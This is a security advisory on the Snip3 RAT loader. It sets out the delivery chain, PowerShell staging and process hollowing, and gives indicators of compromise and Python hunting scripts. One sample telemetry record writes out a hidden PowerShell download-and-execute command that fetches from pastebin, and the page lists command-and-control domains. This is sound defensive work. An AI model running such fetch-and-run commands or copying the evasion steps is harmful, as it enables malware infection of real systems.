Snip3 RAT Loader

Snip3 is a Crypter-as-a-Service which includes a loader that has been involved in some recent campaigns involving RevengeRAT and AsyncRAT.

Report a cyber attack: call 0300 303 5222 or email carecert@nhsdigital.nhs.uk


Affected platforms

The following platforms are known to be affected:

Threat details

Introduction

First observed in February 2021, Snip3 is a loader sold as a Crypter-as-a-Service that delivers several remote access trojans (RATs) onto target machines. It has recently been associated with spear-phishing email campaigns that deliver RevengeRAT and AsyncRAT.


Delivery

The Snip3 crypter is most commonly delivered through phishing emails, but it has also been distributed inside a large installer package, in one case a decoy Adobe installer. The crypter uses several techniques to avoid detection: it checks for VMware and Windows Sandbox virtualisation before proceeding, stages its later components on the public paste and file-hosting services Pastebin and top4top, and launches PowerShell with the RemoteSigned execution policy, which permits locally created, unsigned scripts to run. Several variants have been observed. All of them start from a VBScript that decodes an embedded PowerShell script; that script then downloads, saves and executes a second-stage PowerShell script.


Activities

Once Snip3 is running, the RAT payload is injected into an InstallUtil.exe or RegSvcs.exe process (both legitimate .NET Framework utilities) using a RunPE technique, which overwrites the target process's memory with the payload image. To help evade detection, the RunPE routine is embedded as compressed source code and compiled at runtime, so no ready-made injector binary exists on disk for a scanner to match. Once compiled, PowerShell loads the RunPE function and passes it the RAT payload, and the final payload executes from the hollowed process's memory.
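The delivery chain above (script host launching PowerShell with the RemoteSigned policy, staging on Pastebin or top4top) and the injection step (PowerShell spawning InstallUtil.exe or RegSvcs.exe) can be expressed as rules over ordinary process-creation telemetry. The following Python is an added example, not NHS Digital's code and not the loader's own: it models Sysmon Event ID 1 / Security 4688 style records, fires single-event rules, and then only reports a chain when the script host, PowerShell and the .NET utility are linked by parent-child relationships. The sample events, paths and the `top4top.` label match are constructed or assumed; it runs offline.

```python
"""Hunt for the Snip3 delivery and execution chain in process-creation telemetry.

Added example (not NHS Digital's or the malware's code). Records are modelled on
Sysmon Event ID 1 / Security 4688 fields; the sample events below are constructed.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # image path as logged
    cmdline: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
HOLLOW_TARGETS = {"installutil.exe", "regsvcs.exe"}
# The advisory names Pastebin and top4top as staging hosts but not top4top's TLD,
# so the second entry matches on the label only (assumption).
STAGING_HOSTS = ("pastebin.com", "top4top.")
# -ExecutionPolicy accepts prefix abbreviations such as -ex, -exec and -ep.
REMOTESIGNED = re.compile(r"-e(?:x\w*|p)\s+remotesigned", re.I)


def rules_for(ev: ProcEvent, tree: dict) -> list:
    """Names of the single-event rules that fire on one record."""
    hits = []
    name = basename(ev.image)
    parent = tree.get(ev.ppid)
    pname = basename(parent.image) if parent else ""
    if name in POWERSHELL:
        if pname in SCRIPT_HOSTS:
            hits.append("powershell_from_script_host")
        if REMOTESIGNED.search(ev.cmdline):
            hits.append("remotesigned_policy")
        if any(h in ev.cmdline.lower() for h in STAGING_HOSTS):
            hits.append("staging_host_in_cmdline")
    if name in HOLLOW_TARGETS and pname in POWERSHELL:
        hits.append("dotnet_utility_from_powershell")
    return hits


def ancestry(tree: dict, pid: int) -> list:
    """Walk parent pointers from pid upwards (leaf first); tolerates gaps and cycles."""
    chain, seen = [], set()
    while pid in tree and pid not in seen:
        seen.add(pid)
        chain.append(pid)
        pid = tree[pid].ppid
    return chain


def find_chains(events: list) -> list:
    """Pid chains script host -> PowerShell ... -> InstallUtil/RegSvcs, root first.

    Any single rule also fires on legitimate admin activity; the linked chain is the signal.
    """
    tree = {e.pid: e for e in events}
    chains = []
    for ev in events:
        if "dotnet_utility_from_powershell" not in rules_for(ev, tree):
            continue
        line = ancestry(tree, ev.pid)
        names = [basename(tree[p].image) for p in line]
        if any(n in SCRIPT_HOSTS for n in names):
            top = max(i for i, n in enumerate(names) if n in SCRIPT_HOSTS)
            chains.append(list(reversed(line[: top + 1])))
    return chains


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
IU = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
SAMPLE = [  # constructed telemetry: one Snip3-style chain plus two benign controls
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\alice\Downloads\Invoice_0521.vbs"'),
    ProcEvent(300, 200, PS, "powershell.exe -ExecutionPolicy RemoteSigned -WindowStyle Hidden "
              "-Command \"iwr https://pastebin.com/raw/EXAMPLE -OutFile $env:TEMP\\s2.ps1; "
              "powershell -ep RemoteSigned -w hidden -f $env:TEMP\\s2.ps1\""),
    ProcEvent(400, 300, PS, r"powershell -ep RemoteSigned -w hidden -f C:\Users\alice\AppData\Local\Temp\s2.ps1"),
    ProcEvent(500, 400, IU, IU),                       # no assembly argument at all
    ProcEvent(600, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(700, 600, PS, r"powershell -ExecutionPolicy RemoteSigned -File C:\ops\patch.ps1"),
    ProcEvent(800, 100, r"C:\Windows\System32\msiexec.exe", "msiexec.exe /i app.msi"),
    ProcEvent(900, 800, IU, r'InstallUtil.exe "C:\Program Files\App\svc.exe"'),
]

if __name__ == "__main__":
    tree = {e.pid: e for e in SAMPLE}
    for ev in SAMPLE:
        if hits := rules_for(ev, tree):
            print(f"pid {ev.pid} {basename(ev.image)}: {', '.join(hits)}")
    print("chains:", find_chains(SAMPLE))
```

Two caveats for anyone adapting this. The staging-host rule only fires when the URL appears on the command line; in the real chain the URL usually lives inside the decoded script, so pair it with PowerShell script block logging (Event ID 4104) or DNS telemetry. The hollowing itself is invisible in process-creation events: the .NET utility looks like a normal child of PowerShell, and confirming that its memory was overwritten needs process-access or memory-write telemetry from EDR or Sysmon, or an image-versus-memory comparison on the suspect process.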


Remediation advice

To prevent and detect an infection, NHS Digital advises that:

  • Secure configurations are applied to all devices.
  • Security updates are applied at the earliest opportunity.
  • Tamper protection settings in security products are enabled where available.
  • Obsolete platforms are segregated from the rest of the network.
  • IT usage policies are reinforced by regular training to ensure all users know not to open unsolicited links or attachments.
  • Multi-factor authentication (MFA) and lockout policies are used where practicable, especially for administrative accounts.
  • Administrative accounts are only used for necessary purposes.
  • Remote administration services use strongly encrypted protocols and only accept connections from authorised users or locations.
  • Systems are continuously monitored, and unusual activity is investigated, so that a compromise of the network can be detected as early as possible.

Please note that NCSC maintains guidance for securely configuring a wide range of end user device (EUD) platforms. For further details refer to their end user device security guidance pages.


Indicators of compromise

Network indicators

Domains

  • asin8988[.]ddns[.]net
  • asin8989[.]ddns[.]net
  • asin8990[.]ddns[.]net
  • h0pe1759[.]ddns[.]net
  • kexa600200[.]ddns[.]net
  • kimjoy007[.]dyndns[.]org
  • kimjoy[.]ddns[.]net
  • mail.alamdarhardware[.]com
  • n0ahark2021[.]ddns[.]net

Host Indicators

SHA256 hashes

  • 055e3fc1e814fd23db5950fe2858c06042c911e47dc81c96d8aec8e3d20f3eaf
  • 08f3a0e2cc6e748bd5843e31a5c1ca27b4777a3e06f3aa254a830abf9ba34e11
  • 146f7a39df033afe4bb001da5b4a6eceb89f9efab5538c470b7f7f3cb4bbd15e
  • 17a97f5698f2f19b4b43dc985193f734f8146c83d73daf853df9506f58b696b3
  • 23d4837df84a76f96c674581c96e6a1729bac2981787d3b36ac5149d861f13e5
  • 3378488a2930d73c433e9bbedbeb9065753dd5e236552aa80dd553a7e73ce693
  • 54338b912efb3f4ee2f6760b97d57f924b96215c28c53715cadb7d6636ac6403
  • 620b8057f975eb2475b9a5a0756f21d4b866acc1f02c418ee3d994b74ee6bb77
  • 64345e03d3cc3c080eeb19bdc8db8ddd386083bae3690554b22ee97471354f3
  • 83c50b63c53421202059c528c855b487bc6651a785b40fe521a7e892e4dcd00
  • 8c8e3494796cbd908da7555cff60ed755b18d2b24b398d57a1d8622990d47495
  • 93b0f634bf697c39175a5ad77cc16e4dabf3a10bb0fe81d7a77156d7e5e6ff12
  • 982fb66d84c3d4c8665af9d24a22f3a32c4b9c1aab322db2c79cbe618ed28294
  • aefeb07afc0d9f4d09ab09317db14edef1b58df175f70cf6ea88d7f6cdce8cfc
  • b1606f9dc2798f3bcb1db5bd72eeb4720ada1ba13e9d769d223f5f7df8be9a8f
  • c06fdc9f0dbfd0b42d74c9226ed28f3f52b5bfc04af70f58b8b5b16439196184
  • c8ca46366ec70b0463b3ee7e747c1c22e1d42f7e7e77e0e896edf99aebdbeb10
  • d452cee94e3a2d58b05e9f62a4aa4004c0632d9b56fa8b57664d295bc88c4df0
  • e38f7a1882ac64fab611b3be73fda7eece5fb9a6ea131b36985aa60a0988e937
  • e8aca8f27af178b2c191206c7bc04bfddc604a78b95699a72ca20c22f618c9b0
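Before the indicators above go into a blocklist or a SIEM watchlist they need normalising and checking. The Python below is an added example, not part of the advisory: it refangs the `[.]` notation, validates each hash as 64 hexadecimal characters (two of the hashes as published are 63 characters long and are reported rather than silently loaded), and matches DNS queries on label boundaries so that hosts beneath a listed dynamic-DNS name match while look-alike names such as a `.network` suffix do not. The domains are the page's own entries, only a subset of the hashes is embedded, and the log lines are constructed.

```python
"""Load the advisory's IoCs and match them against DNS and file telemetry.

Added example, not part of the advisory. Indicators are copied from the list
above (three of the domains; a subset of the hashes); the log lines are constructed.
"""
import re

DOMAIN_IOCS = [
    "asin8988[.]ddns[.]net",
    "kimjoy007[.]dyndns[.]org",
    "mail.alamdarhardware[.]com",
]
HASH_IOCS = [
    "055e3fc1e814fd23db5950fe2858c06042c911e47dc81c96d8aec8e3d20f3eaf",
    "64345e03d3cc3c080eeb19bdc8db8ddd386083bae3690554b22ee97471354f3",   # 63 chars as published
    "83c50b63c53421202059c528c855b487bc6651a785b40fe521a7e892e4dcd00",   # 63 chars as published
    "e8aca8f27af178b2c191206c7bc04bfddc604a78b95699a72ca20c22f618c9b0",
]
SHA256_RE = re.compile(r"^[0-9a-f]{64}$")


def refang(indicator: str) -> str:
    """Undo [.] defanging and normalise case and trailing dots."""
    return indicator.strip().replace("[.]", ".").lower().rstrip(".")


def load_hashes(raw):
    """Split the list into well-formed SHA-256 values and rejects.

    A 63-character value can never equal a real digest, so it is reported
    rather than padded, truncated or silently dropped.
    """
    good, bad = set(), []
    for h in raw:
        h = h.strip().lower()
        if SHA256_RE.match(h):
            good.add(h)
        else:
            bad.append(h)
    return good, bad


def domain_matches(query: str, iocs):
    """Return the IoC that covers `query`, matching on label boundaries.

    'www.kimjoy007.dyndns.org' sits under a listed name and matches;
    'asin8988.ddns.network' would pass a substring test but is a different domain;
    'alamdarhardware.com' is the parent of the listed mail host, not the host itself.
    """
    q = refang(query)
    for ioc in map(refang, iocs):
        if q == ioc or q.endswith("." + ioc):
            return ioc
    return None


def scan_dns_log(lines, iocs):
    """(query, matched_ioc) pairs for log lines carrying a query=<name> field."""
    hits = []
    for line in lines:
        m = re.search(r"\bquery=(\S+)", line)
        if m and (ioc := domain_matches(m.group(1), iocs)):
            hits.append((refang(m.group(1)), ioc))
    return hits


def scan_hash_log(lines, hashes):
    """Lower-cased SHA-256 values found in the lines that are on the list."""
    return [h.lower() for line in lines
            for h in re.findall(r"\b[0-9A-Fa-f]{64}\b", line) if h.lower() in hashes]


DNS_LOG = [  # constructed
    "2021-05-12T10:01:02Z client=10.0.0.5 query=asin8988.ddns.net type=A",
    "2021-05-12T10:01:03Z client=10.0.0.5 query=asin8988.ddns.network type=A",
    "2021-05-12T10:02:10Z client=10.0.0.7 query=www.kimjoy007.dyndns.org type=A",
    "2021-05-12T10:03:00Z client=10.0.0.9 query=alamdarhardware.com type=MX",
]
FILE_LOG = [  # constructed
    r"path=C:\Users\alice\AppData\Local\Temp\s2.ps1 sha256=E8ACA8F27AF178B2C191206C7BC04BFDDC604A78B95699A72CA20C22F618C9B0",
    r"path=C:\Windows\notepad.exe sha256=0000000000000000000000000000000000000000000000000000000000000000",
]

if __name__ == "__main__":
    hashes, rejected = load_hashes(HASH_IOCS)
    print("rejected (not 64 hex chars):", rejected)
    print("dns hits:", scan_dns_log(DNS_LOG, DOMAIN_IOCS))
    print("file hits:", scan_hash_log(FILE_LOG, hashes))
```

The two rejected values should be queried back to the publisher or cross-checked against another source rather than guessed at; a blocklist entry that can never match gives false assurance. Note also that the `ddns.net` and `dyndns.org` hosts are dynamic-DNS names whose resolved addresses can change at any time, so match on the name in DNS logs rather than on whatever IP they resolved to when the advisory was written.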

Last edited: 20 May 2021 4:19 pm